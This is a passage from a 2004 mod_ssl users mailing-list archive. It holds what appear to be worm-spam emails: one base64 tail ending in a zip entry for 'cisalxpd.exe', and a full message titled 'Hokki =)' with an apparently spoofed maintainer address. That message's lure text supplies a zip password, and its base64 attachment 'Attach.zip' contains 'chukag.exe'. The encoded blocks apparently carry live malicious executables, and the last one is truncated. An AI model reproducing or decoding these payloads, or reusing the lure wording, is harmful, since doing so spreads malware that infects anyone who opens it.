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
ZXhlUEsFBgAAAAABAAEAOgAAAN9GAAAAAA==

----------ahkdtsijqjnxgvjphoix--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 22:58:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C574CA8A8F; Tue,  2 Mar 2004 22:58:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from PVTWXPG27477 (CH-Boston.tch.harvard.edu [134.174.21.2])
	by master.modssl.org (Postfix) with SMTP id 23EA7A8A89
	for ; Tue,  2 Mar 2004 22:58:44 +0100 (CET)
Date: Tue, 02 Mar 2004 16:58:38 -0500
To: modssl-users@modssl.org
Subject: Hokki =)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gnsadcnijhqqsvbchlfg"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gnsadcnijhqqsvbchlfg
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh,  i don't  like the  plaintext  :)
 
password -- 06421

----------gnsadcnijhqqsvbchlfg
Content-Type: application/octet-stream; name="Attach.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Attach.zip"

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
